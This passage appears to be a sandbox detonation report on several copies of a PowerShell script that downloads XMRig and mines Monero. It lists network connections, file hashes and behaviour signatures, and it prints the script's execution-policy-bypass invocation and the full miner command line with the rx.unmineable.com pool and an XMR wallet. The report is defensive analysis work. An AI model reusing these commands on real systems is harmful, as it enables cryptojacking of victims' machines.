US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
BE 88.221.83.187:443 www.bing.com tcp
US 8.8.8.8:53 187.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 21.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ulpl3bhd.q0v.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3


Analysis: behavioral7

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:53

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
BE 88.221.83.187:443 www.bing.com tcp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 187.83.221.88.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 77.239.69.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_u3qn0zi5.j0t.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 03:58

Platform

win10-20240404-en

Max time kernel

1796s

Max time network

1763s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 85.65.42.20.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 56.94.73.104.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e3ewtbgn.qqn.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral28

Detonation Overview

Submitted

2024-05-27 00:27

Reported

2024-05-27 04:13

Platform

win11-20240508-en

Max time kernel

1799s

Max time network

1772s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_peaw5jpr.10k.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3
